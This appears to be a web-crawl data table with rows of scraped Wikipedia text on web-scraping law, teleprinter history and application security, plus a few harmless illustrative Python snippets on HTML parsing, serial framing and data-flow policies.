16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
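To make the two basic extraction approaches mentioned in the article above concrete (regular-expression matching on the raw markup versus parsing the page into a DOM tree), here is a small sketch using the re and BeautifulSoup modules already imported in this notebook. The inline HTML, class names, and selectors are invented for illustration.

import re
from bs4 import BeautifulSoup

# A tiny inline page standing in for a template-generated listing.
html = """
<html><body>
  <div class="product"><h2>Widget A</h2><span class="price">$19.99</span></div>
  <div class="product"><h2>Widget B</h2><span class="price">$24.50</span></div>
</body></html>
"""

# Regex approach: quick to write, but brittle if the markup changes.
prices = re.findall(r'<span class="price">\$([\d.]+)</span>', html)

# DOM approach: parse the page and walk the tree instead of the raw text.
soup = BeautifulSoup(html, "html.parser")
products = [
    (div.h2.get_text(strip=True), div.select_one(".price").get_text(strip=True))
    for div in soup.select("div.product")
]

print(prices)    # ['19.99', '24.50']
print(products)  # [('Widget A', '$19.99'), ('Widget B', '$24.50')]

The regex version breaks as soon as attribute order or whitespace changes, which is why walking the parsed tree is usually preferred for anything beyond one-off extraction.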
165 | https://en.wikipedia.org/wiki/Web_scraping | https://eu.wikipedia.org/wiki/Web_scraping | Web scraping is a technique used to extract information from websites by means of software programs. Normally, these programs simulate a person browsing the Web, either by using the HTTP protocol directly or by embedding a browser in an application. In recent years, web scraping has been widely used in the search-engine-positioning (SEO) sector, because of its capacity to collect and organize large amounts of data for producing quality content. 1 A website administrator can use various techniques to stop or hinder scrapers' requests: |
166 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Teleprinter | A teleprinter (teletypewriter, teletype or TTY) is an electromechanical device that can be used to send and receive typed messages through various communications channels, in both point-to-point and point-to-multipoint configurations. Initially, from 1887 at the earliest, teleprinters were used in telegraphy. 1 Electrical telegraphy had been developed decades earlier in the late 1830s and 1840s, 2 then using simpler Morse key equipment and telegraph operators. The introduction of teleprinters automated much of this work and eventually largely replaced skilled operators versed in Morse code with typists and machines communicating faster via Baudot code. With the development of early computers in the 1950s, 3 teleprinters were adapted to allow typed data to be sent to a computer, and responses printed. Some teleprinter models could also be used to create punched tape for data storage (either from typed input or from data received from a remote source) and to read back such tape for local printing or transmission. A teleprinter attached to a modem could also communicate through telephone lines. This latter configuration was often used to connect teleprinters to remote computers, particularly in time-sharing environments. Teleprinters have largely been replaced by fully electronic computer terminals which typically have a computer monitor instead of a printer (though the term "TTY" is still occasionally used to refer to them, such as in Unix systems). Teleprinters are still widely used in the aviation industry (see AFTN and airline teletype system), 4 and variants called Telecommunications Devices for the Deaf (TDDs) are used by the hearing impaired for typed communications over ordinary telephone lines. The teleprinter evolved through a series of inventions by a number of engineers, including Samuel Morse, Alexander Bain, Royal Earl House, David Edward Hughes, Emile Baudot, Donald Murray, Charles L. Krum, Edward Kleinschmidt and Frederick G. Creed. Teleprinters were invented in order to send and receive messages without the need for operators trained in the use of Morse code. A system of two teleprinters, with one operator trained to use a keyboard, replaced two trained Morse code operators. The teleprinter system improved message speed and delivery time, making it possible for messages to be flashed across a country with little manual intervention. 5 There were a number of parallel developments on both sides of the Atlantic Ocean. In 1835 Samuel Morse devised a recording telegraph, and Morse code was born. 6 Morse's instrument used a current to displace the armature of an electromagnet, which moved a marker, therefore recording the breaks in the current. Cooke Wheatstone received a British patent covering telegraphy in 1837 and a second one in 1840 which described a type-printing telegraph with steel type fixed at the tips of petals of a rotating brass daisy-wheel, struck by an "electric hammer" to print Roman letters through carbon paper onto a moving paper tape. 7 In 1841 Alexander Bain devised an electromagnetic printing telegraph machine. It used pulses of electricity created by rotating a dial over contact points to release and stop a type-wheel turned by weight-driven clockwork; a second clockwork mechanism rotated a drum covered with a sheet of paper and moved it slowly upwards so that the type-wheel printed its signals in a spiral. 
The critical issue was to have the sending and receiving elements working synchronously. Bain attempted to achieve this using centrifugal governors to closely regulate the speed of the clockwork. It was patented, along with other devices, on April 21, 1841. 8 By 1846, the Morse telegraph service was operational between Washington, D.C., and New York. Royal Earl House patented his printing telegraph that same year. He linked two 28 key piano-style keyboards by wire. Each piano key represented a letter of the alphabet and when pressed caused the corresponding letter to print at the receiving end. A "shift" key gave each main key two optional values. A 56 character typewheel at the sending end was synchronised to coincide with a similar wheel at the receiving end. If the key corresponding to a particular character was pressed at the home station, it actuated the typewheel at the distant station just as the same character moved into the printing position, in a way similar to the (much later) daisy wheel printer. It was thus an example of a synchronous data transmission system. House's equipment could transmit around 40 instantly readable words per minute, but was difficult to manufacture in bulk. The printer could copy and print out up to 2,000 words per hour. This invention was first put in operation and exhibited at the Mechanics Institute in New York in 1844. Landline teleprinter operations began in 1849, when a circuit was put in service between Philadelphia and New York City. 9 In 1855, David Edward Hughes introduced an improved machine built on the work of Royal Earl House. In less than two years, a number of small telegraph companies, including Western Union in early stages of development, united to form one large corporation Western Union Telegraph Co. to carry on the business of telegraphy on the Hughes system. 10 In France, mile Baudot designed in 1874 a system using a five-unit code, which began to be used extensively in that country from 1877. The British Post Office adopted the Baudot system for use on a simplex circuit between London and Paris in 1897, and subsequently made considerable use of duplex Baudot systems on their Inland Telegraph Services. 11 During 1901, Baudot's code was modified by Donald Murray (1865 1945, originally from New Zealand), prompted by his development of a typewriter-like keyboard. The Murray system employed an intermediate step, a keyboard perforator, which allowed an operator to punch a paper tape, and a tape transmitter for sending the message from the punched tape. At the receiving end of the line, a printing mechanism would print on a paper tape, and or a reperforator could be used to make a perforated copy of the message. 12 As there was no longer a direct correlation between the operator's hand movement and the bits transmitted, there was no concern about arranging the code to minimize operator fatigue, and instead Murray designed the code to minimize wear on the machinery, assigning the code combinations with the fewest punched holes to the most frequently used characters. The Murray code also introduced what became known as "format effectors" or "control characters" the CR (Carriage Return) and LF (Line Feed) codes. A few of Baudot's codes moved to the positions where they have stayed ever since: the NULL or BLANK and the DEL code. NULL BLANK was used as an idle code for when no messages were being sent. 
5 In the United States in 1902, electrical engineer Frank Pearne approached Joy Morton, head of Morton Salt, seeking a sponsor for research into the practicalities of developing a printing telegraph system. Joy Morton needed to determine whether this was worthwhile and so consulted mechanical engineer Charles L. Krum, who was vice president of the Western Cold Storage Company. Krum was interested in helping Pearne, so space was set up in a laboratory in the attic of Western Cold Storage. Frank Pearne lost interest in the project after a year and left to get involved in teaching. Krum was prepared to continue Pearne’s work, and in August, 1903 a patent was filed for a 'typebar page printer'. 13 In 1904, Krum filed a patent for a 'type wheel printing telegraph machine' 14 which was issued in August, 1907. In 1906 Charles Krum's son, Howard Krum, joined his father in this work. It was Howard who developed and patented the start-stop synchronizing method for code telegraph systems, which made possible the practical teleprinter. 15 In 1908, a working teleprinter was produced by the Morkrum Company (formed between Joy Morton and Charles Krum), called the Morkrum Printing Telegraph, which was field tested with the Alton Railroad. In 1910, the Morkrum Company designed and installed the first commercial teletypewriter system on Postal Telegraph Company lines between Boston and New York City using the "Blue Code Version" of the Morkrum Printing Telegraph. 16 17 In 1916, Edward Kleinschmidt filed a patent application for a typebar page printer. 18 In 1919, shortly after the Morkrum company obtained their patent for a start-stop synchronizing method for code telegraph systems, which made possible the practical teleprinter, Kleinschmidt filed an application titled "Method of and Apparatus for Operating Printing Telegraphs" 19 which included an improved start-stop method. 20 The basic start-stop procedure, however, is much older than the Kleinschmidt and Morkrum inventions. It was already proposed by D'Arlincourt in 1870. 21 Instead of wasting time and money in patent disputes on the start-stop method, Kleinschmidt and the Morkrum Company decided to merge and form the Morkrum-Kleinschmidt Company in 1924. The new company combined the best features of both their machines into a new typewheel printer for which Kleinschmidt, Howard Krum, and Sterling Morton jointly obtained a patent. 20 In 1924 Britain's Creed Company, founded by Frederick G. Creed, entered the teleprinter field with their Model 1P, a page printer, which was soon superseded by the improved Model 2P. In 1925 Creed acquired the patents for Donald Murray's Murray code, a rationalised Baudot code. The Model 3 tape printer, Creed’s first combined start-stop machine, was introduced in 1927 for the Post Office telegram service. This machine printed received messages directly on to gummed paper tape at a rate of 65 words per minute. Creed created his first keyboard perforator, which used compressed air to punch the holes. He also created a reperforator (receiving perforator) and a printer. The reperforator punched incoming Morse signals on to paper tape and the printer decoded this tape to produce alphanumeric characters on plain paper. This was the origin of the Creed High Speed Automatic Printing System, which could run at an unprecedented 200 words per minute. His system was adopted by the Daily Mail for daily transmission of the newspaper's contents. 
The Creed Model 7 page printing teleprinter was introduced in 1931 and was used for the inland Telex service. It worked at a speed of 50 baud, about 66 words a minute, using a code based on the Murray code. A teleprinter system was installed in the Bureau of Lighthouses, Airways Division, Flight Service Station Airway Radio Stations system in 1928, carrying administrative messages, flight information and weather reports. 22 By 1938, the teleprinter network, handling weather traffic, extended over 20,000 miles, covering all 48 states except Maine, New Hampshire, and South Dakota. 23 Teleprinters could use a variety of different communication channels. These included a simple pair of wires, public switched telephone networks, dedicated non-switched telephone circuits (leased lines), switched networks that operated similarly to the public telephone network (telex), and radio and microwave links (telex-on-radio, or TOR). There were at least five major types of teleprinter networks. Before the computer revolution (and information processing performance improvements thanks to Moore's law) made it possible to securely encrypt voice and video calls, teleprinters were long used in combination with electromechanical or electronic cryptographic devices to provide secure communication channels. Being limited to text only was an acceptable trade-off for security. Most teleprinters used the 5-bit International Telegraph Alphabet No. 2 (ITA2). This was limited to 32 codes (2⁵ = 32). One had to use "FIGS" (for "figures") and "LTRS" (for "letters") keys to shift state, for a combined character set sufficient to type both letters and numbers, as well as some special characters. (The letters were uppercase only.) Special versions of teleprinters had FIGS characters for specific applications, such as weather symbols for weather reports. Print quality was poor by modern standards. The ITA2 code was used asynchronously with start and stop bits: the asynchronous code design was intimately linked with the start-stop electro-mechanical design of teleprinters. (Early systems had used synchronous codes, but were hard to synchronize mechanically.) Other codes, such as FIELDATA and Flexowriter, were introduced but never became as popular as ITA2. Mark and space are terms describing logic levels in teleprinter circuits. The native mode of communication for a teleprinter is a simple series DC circuit that is interrupted, much as a rotary dial interrupts a telephone signal. The marking condition is when the circuit is closed (current is flowing); the spacing condition is when the circuit is open (no current is flowing). The "idle" condition of the circuit is a continuous marking state, with the start of a character signalled by a "start bit", which is always a space. Following the start bit, the character is represented by a fixed number of bits, such as 5 bits in the ITA2 code, each either a mark or a space to denote the specific character or machine function. After the character's bits, the sending machine sends one or more stop bits. The stop bits are marking, so as to be distinct from the subsequent start bit. If the sender has nothing more to send, the line simply remains in the marking state (as if a continuing series of stop bits) until a later space denotes the start of the next character. The time between characters need not be an integral multiple of a bit time, but it must be at least the minimum number of stop bits required by the receiving machine.
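The mark/space start-stop framing described above can be pictured with a few lines of code. The sketch below serializes 5-bit character codes exactly as the paragraph describes (idle mark, a space start bit, five data bits, then marking stop bits); the sample code values are arbitrary and do not come from a real ITA2 chart.

# Minimal sketch of start-stop framing: the idle line rests at mark (current
# flowing); each character is a space start bit, five data bits (mark or
# space), and one or more marking stop bits. Sample codes are illustrative.
MARK, SPACE = 1, 0

def frame_character(code5, stop_bits=2):
    data = [(code5 >> i) & 1 for i in range(5)]   # least-significant bit first
    return [SPACE] + data + [MARK] * stop_bits    # start bit, data bits, stop bits

def frame_message(codes):
    line = [MARK, MARK]                           # idle line: continuous marking
    for code in codes:
        line.extend(frame_character(code))
    return line

print(frame_message([0b10101, 0b00011]))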
When the line is broken, the continuous spacing (open circuit, no current flowing) causes a receiving teleprinter to cycle continuously, even in the absence of stop bits. It prints nothing because the characters received are all zeros, the ITA2 blank (or ASCII) null character. Teleprinter circuits were generally leased from a communications common carrier and consisted of ordinary telephone cables that extended from the teleprinter located at the customer location to the common carrier central office. These teleprinter circuits were connected to switching equipment at the central office for Telex and TWX service. Private line teleprinter circuits were not directly connected to switching equipment. Instead, these private line circuits were connected to network hubs and repeaters configured to provide point to point or point to multipoint service. More than two teleprinters could be connected to the same wire circuit by means of a current loop. Earlier teleprinters had three rows of keys and only supported upper case letters. They used the 5 bit ITA2 code and generally worked at 60 to 100 words per minute. Later teleprinters, specifically the Teletype Model 33, used ASCII code, an innovation that came into widespread use in the 1960s as computers became more widely available. "Speed", intended to be roughly comparable to words per minute, is the standard term introduced by Western Union for a mechanical teleprinter data transmission rate using the 5 bit ITA2 code that was popular in the 1940s and for several decades thereafter. Such a machine would send 1 start bit, 5 data bits, and 1.42 stop bits. This unusual stop bit time is actually a rest period to allow the mechanical printing mechanism to synchronize in the event that a garbled signal is received. 26 This is true especially on high frequency radio circuits where selective fading is present. Selective fading causes the mark signal amplitude to be randomly different from the space signal amplitude. Selective fading, or Rayleigh fading can cause two carriers to randomly and independently fade to different depths. 27 Since modern computer equipment cannot easily generate 1.42 bits for the stop period, common practice is to either approximate this with 1.5 bits, or to send 2.0 bits while accepting 1.0 bits receiving. For example, a "60 speed" machine is geared at 45.5 baud (22.0 ms per bit), a "66 speed" machine is geared at 50.0 baud (20.0 ms per bit), a "75 speed" machine is geared at 56.9 baud (17.5 ms per bit), a "100 speed" machine is geared at 74.2 baud (13.5 ms per bit), and a "133 speed" machine is geared at 100.0 baud (10.0 ms per bit). 60 speed became the de facto standard for amateur radio RTTY operation because of the widespread availability of equipment at that speed and the U.S. Federal Communications Commission (FCC) restrictions to only 60 speed from 1953 to 1972. Telex, news agency wires and similar services commonly used 66 speed services. There was some migration to 75 and 100 speed as more reliable devices were introduced. However, the limitations of HF transmission such as excessive error rates due to multipath distortion and the nature of ionospheric propagation kept many users at 60 and 66 speed. Most audio recordings in existence today are of teleprinters operating at 60 words per minute, and mostly of the Teletype Model 15. Another measure of the speed of a teletypewriter was in total "operations per minute (OPM) . 
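The baud, bit-time and OPM figures quoted here and in the next paragraph follow from simple arithmetic on the 7.42-bit character frame (1 start + 5 data + 1.42 stop bits); a minimal sketch of that arithmetic, assuming roughly six character operations per word:

# Arithmetic behind the "speed" and OPM figures: each character occupies
# 1 + 5 + 1.42 = 7.42 bit times, so characters per second = baud / 7.42 and
# operations per minute (OPM) = 60 * baud / 7.42. Words per minute assumes
# about six character operations per word (an assumption for illustration).
BITS_PER_CHARACTER = 1 + 5 + 1.42

def bit_time_ms(baud):
    return 1000.0 / baud

def opm(baud):
    return 60.0 * baud / BITS_PER_CHARACTER

def approx_wpm(baud):
    return opm(baud) / 6.0

for baud in (45.5, 50.0, 56.9, 74.2, 100.0):
    print(f"{baud:6.1f} baud: {bit_time_ms(baud):5.1f} ms/bit, "
          f"{opm(baud):5.0f} OPM, ~{approx_wpm(baud):3.0f} wpm")
# 45.5 baud works out to about 22 ms per bit and ~368 OPM ("60 speed"), 50 baud
# to ~404 OPM ("66 speed"), and 74.2 baud to ~600 OPM ("100 speed").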
For example, 60 speed was usually 368 OPM, 66 speed was 404 OPM, 75 speed was 460 OPM, and 100 speed was 600 OPM. Western Union Telexes were usually set at 390 OPM, with 7.0 total bits instead of the customary 7.42 bits. Both wire-service and private teleprinters had bells to signal important incoming messages and could ring 24 7 while the power was turned on. For example, ringing 4 bells on UPI wire-service machines meant an "Urgent" message; 5 bells was a "Bulletin"; and 10 bells was a FLASH, used only for very important news. The teleprinter circuit was often linked to a 5 bit paper tape punch (or "reperforator") and reader, allowing messages received to be resent on another circuit. Complex military and commercial communications networks were built using this technology. Message centers had rows of teleprinters and large racks for paper tapes awaiting transmission. Skilled operators could read the priority code from the hole pattern and might even feed a "FLASH PRIORITY" tape into a reader while it was still coming out of the punch. Routine traffic often had to wait hours for relay. Many teleprinters had built-in paper tape readers and punches, allowing messages to be saved in machine-readable form and edited off-line. Communication by radio, known as radioteletype or RTTY (pronounced ritty), was also common, especially among military users. Ships, command posts (mobile, stationary, and even airborne) and logistics units took advantage of the ability of operators to send reliable and accurate information with a minimum of training. Amateur radio operators continue to use this mode of communication today, though most use computer-interface sound generators, rather than legacy hardware teleprinter equipment. Numerous modes are in use within the "ham radio" community, from the original ITA2 format to more modern, faster modes, which include error-checking of characters. A typewriter or electromechanical printer can print characters on paper, and execute operations such as move the carriage back to the left margin of the same line (carriage return), advance to the same column of the next line (line feed), and so on. Commands to control non-printing operations were transmitted in exactly the same way as printable characters by sending control characters with defined functions (e.g., the line feed character forced the carriage to move to the same position on the next line) to teleprinters. In modern computing and communications a few control characters, such as carriage return and line feed, have retained their original functions (although they are often implemented in software rather than activating electromechanical mechanisms to move a physical printer carriage) but many others are no longer required and are used for other purposes. Some teleprinters had a "Here is" key, which transmitted a fixed sequence of 20 or 22 characters, programmable by breaking tabs off a drum. This sequence could also be transmitted automatically upon receipt of an ENQ (control E) signal, if enabled. 28 29 This was commonly used to identify a station; the operator could press the key to send the station identifier to the other end, or the remote station could trigger its transmission by sending the ENQ character, essentially asking "who are you? British Creed Company built teleprinters for the GPO's teleprinter service. 30 The Gretag ETK 47 teleprinter developed in Switzerland by Edgar Gretener in 1947 uses a 14 bit start-stop transmission method similar to the 5 bit code used by other teleprinters. 
However, instead of a more-or-less arbitrary mapping between 5 bit codes and letters in the Latin alphabet, all characters (letters, digits, and punctuation) printed by the ETK are built from 14 basic elements on a print head, very similar to the 14 elements on a modern fourteen-segment display, each one selected independently by one of the 14 bits during transmission. Because it does not use a fixed character set, but instead builds up characters from smaller elements, the ETK printing element does not require modification to switch between Latin, Cyrillic, and Greek characters. 31 32 33 34 In 1931, American inventor Edward Kleinschmidt formed Kleinschmidt Labs to pursue a different design of teleprinter. In 1944 Kleinschmidt demonstrated their lightweight unit to the Signal Corps and in 1949 their design was adopted for the Army's portable needs. In 1956, Kleinschmidt Labs merged with Smith-Corona, which then merged with the Marchant Calculating Machine Co., forming the SCM Corporation. By 1979, the Kleinschmidt division was turning to Electronic Data Interchange and away from mechanical products. Kleinschmidt machines, with the military as their primary customer, used standard military designations for their machines. The teleprinter was identified with designations such as a TT 4 FG, while communication "sets" to which a teleprinter might be a part generally used the standard Army Navy designation system such as AN FGC 25. This includes Kleinschmidt teleprinter TT 117 FG and tape reperforator TT 179 FG. Morkrum made their first commercial installation of a printing telegraph with the Postal Telegraph Company in Boston and New York in 1910. 35 It became popular with railroads, and the Associated Press adopted it in 1914 for their wire service. 16 36 Morkrum merged with their competitor Kleinschmidt Electric Company to become Morkrum-Kleinschmidt Corporation shortly before being renamed the Teletype Corporation. 37 38 Italian office equipment maker Olivetti (est. 1908) started to manufacture teleprinters in order to provide Italian post offices with modern equipment to send and receive telegrams. The first models typed on a paper ribbon, which was then cut and glued into telegram forms. Siemens Halske, later Siemens AG, a German company, founded in 1847. The Teletype Corporation, a part of American Telephone and Telegraph Company's Western Electric manufacturing arm since 1930, was founded in 1906 as the Morkrum Company. In 1925, a merger between Morkrum and Kleinschmidt Electric Company created the Morkrum-Kleinschmidt Company. The name was changed in December 1928 to Teletype Corporation. In 1930, Teletype Corporation was purchased by the American Telephone and Telegraph Company and became a subsidiary of Western Electric. In 1984, the divestiture of the Bell System resulted in the Teletype name and logo being replaced by the AT T name and logo, eventually resulting in the brand being extinguished. 39 The last vestiges of what had been the Teletype Corporation ceased in 1990, bringing to a close the dedicated teleprinter business. Despite its long-lasting trademark status, the word Teletype went into common generic usage in the news and telecommunications industries. Records of the United States Patent and Trademark Office indicate the trademark has expired and is considered dead. 40 Teletype machines tended to be large, heavy, and extremely robust, capable of running non-stop for months at a time if properly lubricated. 
41 The Model 15 stands out as one of a few machines that remained in production for many years. It was introduced in 1930 and remained in production until 1963, a total of 33 years of continuous production. Very few complex machines can match that record. The production run was stretched somewhat by World War II—the Model 28 was scheduled to replace the Model 15 in the mid 1940s, but Teletype built so many factories to produce the Model 15 during World War II, it was more economical to continue mass production of the Model 15. The Model 15, in its receive only, no keyboard, version was the classic "news Teletype" for decades. Several different high-speed printers like the "Ink-tronic" etc. Texas Instruments developed its own line of teletypes in 1971, the Silent 700. Their name came from the use of a thermal printer head to emit copy, making them substantially quieter than contemporary teletypes using impact printing, and some such as the 1975 Model 745 and 1983 Model 707 were even small enough to be sold as portable units. Certain models came with acoustic couplers and some had internal storage, initially cassette tape in the 1973 Models 732 733 ASR and later bubble memory in the 1977 Models 763 765, the first and one of the few commercial products to use the technology. 43 In these units their storage capability essentially acted as a form of punched tape. The last Silent 700 was the 1987 700 1200 BPS, which was sold into the early 1990s. A global teleprinter network called Telex was developed in the late 1920s, and was used through most of the 20th century for business communications. The main difference from a standard teleprinter is that Telex includes a switched routing network, originally based on pulse-telephone dialing, which in the United States was provided by Western Union. AT T developed a competing network called "TWX" which initially also used rotary dialing and Baudot code, carried to the customer premises as pulses of DC on a metallic copper pair. TWX later added a second ASCII-based service using Bell 103 type modems served over lines whose physical interface was identical to regular telephone lines. In many cases, the TWX service was provided by the same telephone central office that handled voice calls, using class of service to prevent POTS customers from connecting to TWX customers. Telex is still in use in some countries for certain applications such as shipping, news, weather reporting and military command. Many business applications have moved to the Internet as most countries have discontinued telex TWX services. In addition to the 5 bit Baudot code and the much later seven-bit ASCII code, there was a six-bit code known as the Teletypesetter code (TTS) used by news wire services. It was first demonstrated in 1928 and began to see widespread use in the 1950s. 44 Through the use of "shift in" and "shift out" codes, this six-bit code could represent a full set of upper and lower case characters, digits, symbols commonly used in newspapers, and typesetting instructions such as "flush left" or "center", and even "auxiliary font", to switch to italics or bold type, and back to roman ("upper rail"). 45 The TTS produces aligned text, taking into consideration character widths and column width, or line length. A Model 20 Teletype machine with a paper tape punch ("reperforator") was installed at subscriber newspaper sites. 
Originally these machines would simply punch paper tapes and these tapes could be read by a tape reader attached to a "Teletypesetter operating unit" installed on a Linotype machine. The "operating unit" was essentially a tape reader which actuated a mechanical box, which in turn operated the Linotype's keyboard and other controls, in response to the codes read from the tape, thus creating type for printing in newspapers and magazines. 46 This allowed higher production rates for the Linotype, and was used both locally, where the tape was first punched and then fed to the machine, as well as remotely, using tape transmitters and receivers. Remote use played an essential role for distributing identical content, such as syndicated columns, news agency news, classified advertising, and more, to different publications across wide geographical areas. In later years the incoming 6-bit current loop signal carrying the TTS code was connected to a minicomputer or mainframe for storage, editing, and eventual feed to a phototypesetting machine. Computers used teleprinters for input and output from the early days of computing. Punched card readers and fast printers replaced teleprinters for most purposes, but teleprinters continued to be used as interactive time-sharing terminals until video displays became widely available in the late 1970s. Users typed commands after a prompt character was printed. Printing was unidirectional; if the user wanted to delete what had been typed, further characters were printed to indicate that previous text had been cancelled. When video displays first became available the user interface was initially exactly the same as for an electromechanical printer; expensive and scarce video terminals could be used interchangeably with teleprinters. This was the origin of the text terminal and the command-line interface. Paper tape was sometimes used to prepare input for the computer session off line and to capture computer output. The popular Teletype Model 33 used 7-bit ASCII code (with an eighth parity bit) instead of Baudot. The common modem communications settings, Start/Stop Bits and Parity, stem from the Teletype era. In early operating systems such as Digital's RT-11, serial communication lines were often connected to teleprinters and were given device names starting with tt. This and similar conventions were adopted by many other operating systems. Unix and Unix-like operating systems use the prefix tty, for example /dev/tty13, or pty (for pseudo-tty), such as /dev/ptya0, but some of them (e.g., Solaris and recent Linux) have replaced the pty device files with a pts directory such as /dev/pts (where "pt" stands for "pseudoterminal" instead). In many computing contexts, "TTY" has become the name for any text terminal, such as an external console device, a user dialing into the system on a modem on a serial port device, a printing or graphical computer terminal on a computer's serial port or the RS-232 port on a USB-to-RS-232 converter attached to a computer's USB port, or even a terminal emulator application in the window system using a pseudoterminal device. Teleprinters were also used to record fault printout and other information in some TXE telephone exchanges. Although printing news, messages, and other text at a distance is still universal, the dedicated teleprinter tied to a pair of leased copper wires was made functionally obsolete by the fax, personal computer, inkjet printer, email, and the Internet. In the 1980s, packet radio became the most common form of digital communications used in amateur radio.
Soon, advanced multimode electronic interfaces such as the AEA PK-232 were developed, which could send and receive not only packet, but various other modulation types including Baudot. This made it possible for a home or laptop computer to replace teleprinters, saving money, complexity, space and the massive amount of paper which mechanical machines used. |
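A quick way to see the Unix tty/pty naming convention mentioned in the teleprinter text above is to ask the operating system which terminal device the current process is attached to; a minimal, Unix-only sketch using standard-library calls:

# Show the terminal ("TTY") device backing standard input, if any. On Unix
# systems this prints a device path such as /dev/pts/0 when run interactively.
import os
import sys

fd = sys.stdin.fileno()
if os.isatty(fd):
    print("stdin is a terminal:", os.ttyname(fd))
else:
    print("stdin is not attached to a terminal (redirected or piped)")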
167 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Application_security | Application security (often shortened to AppSec) includes all tasks that introduce a secure software development life cycle to development teams. Its final goal is to improve security practices and, through that, to find, fix and preferably prevent security issues within applications. It encompasses the whole application life cycle, from requirements analysis, design, implementation, and verification through maintenance. 1 Web application security is a branch of information security that deals specifically with the security of websites, web applications, and web services. At a high level, web application security draws on the principles of application security but applies them specifically to the internet and web systems. 2 3 Application security also concentrates on mobile apps and their security, including iOS and Android applications. Web application security tools are specialized tools for working with HTTP traffic, e.g., web application firewalls. Different approaches will find different subsets of the security vulnerabilities lurking in an application and are most effective at different times in the software lifecycle. They each represent different tradeoffs of time, effort, cost and vulnerabilities found. The Open Web Application Security Project (OWASP) provides free and open resources. It is led by a non-profit called The OWASP Foundation. The OWASP Top 10 - 2017 results from recent research based on comprehensive data compiled from over 40 partner organizations. This data revealed approximately 2.3 million vulnerabilities across over 50,000 applications. 4 The OWASP Top 10 - 2021 lists the ten most critical web application security risks. 5 Security testing techniques scour for vulnerabilities or security holes in applications. These vulnerabilities leave applications open to exploitation. Ideally, security testing is implemented throughout the entire Software Development Life Cycle (SDLC) so that vulnerabilities may be addressed in a timely and thorough manner. There are many kinds of automated tools for identifying vulnerabilities in applications, spanning several common tool categories. Resin is a new tool for improving application security and reducing vulnerabilities. It allows developers to specify rules about how data should flow through an application to prevent security issues. This is done using policy objects to define the rules, data tracking to monitor the data flow, and filter objects to check the rules at specific points in the data flow. 12 |
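The Resin approach mentioned at the end of the row above (policy objects, data-flow tracking and filter objects) can be sketched in a highly simplified way. The class and function names below are invented for illustration and are not Resin's actual API.

# Simplified illustration of the policy/filter idea: tag a value with a policy,
# carry the tag along as the value flows, and enforce the policy at a filter
# point just before the value reaches an output sink. Names are illustrative.
class Policy:
    def allows(self, sink):
        raise NotImplementedError

class NoExternalDisclosure(Policy):
    """Permit the tagged value to flow only to internal sinks."""
    def allows(self, sink):
        return sink == "internal_log"

class TaggedValue:
    def __init__(self, value, policy):
        self.value = value
        self.policy = policy

def output_filter(data, sink):
    if not data.policy.allows(sink):              # filter object checks the rule
        raise PermissionError(f"policy forbids sending this value to {sink!r}")
    print(f"[{sink}] {data.value}")

password_hash = TaggedValue("5f4dcc3b...", NoExternalDisclosure())
output_filter(password_hash, "internal_log")      # allowed
# output_filter(password_hash, "http_response")   # would raise PermissionError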
